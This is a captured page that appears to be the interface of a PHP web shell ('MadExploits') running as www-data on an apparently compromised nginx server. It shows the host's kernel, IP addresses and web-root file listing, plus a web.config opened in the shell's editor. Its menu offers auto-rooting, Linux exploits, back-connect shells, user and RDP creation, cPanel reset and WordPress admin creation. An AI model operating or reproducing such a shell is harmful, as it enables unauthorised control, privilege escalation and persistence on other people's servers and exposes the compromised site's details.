Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
ckeditor5
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxrwxr-x
dist
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
new_assets
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
toastr
[ DIR ]
drwxrwxr-x
uploads
[ DIR ]
drwxr-xr-x
.htaccess
603
B
-rw-rw-r--
favicon.ico
0
B
-rw-rw-r--
index.php
1.69
KB
-rw-rw-r--
robots.txt
24
B
-rw-rw-r--
web.config
1.16
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : web.config
<!-- Rewrites requires Microsoft URL Rewrite Module for IIS Download: https://www.iis.net/downloads/microsoft/url-rewrite Debug Help: https://docs.microsoft.com/en-us/iis/extensions/url-rewrite-module/using-failed-request-tracing-to-trace-rewrite-rules --> <configuration> <system.webServer> <rewrite> <rules> <rule name="Imported Rule 1" stopProcessing="true"> <match url="^(.*)/$" ignoreCase="false" /> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> </conditions> <action type="Redirect" redirectType="Permanent" url="/{R:1}" /> </rule> <rule name="Imported Rule 2" stopProcessing="true"> <match url="^" ignoreCase="false" /> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite> </system.webServer> </configuration>
Close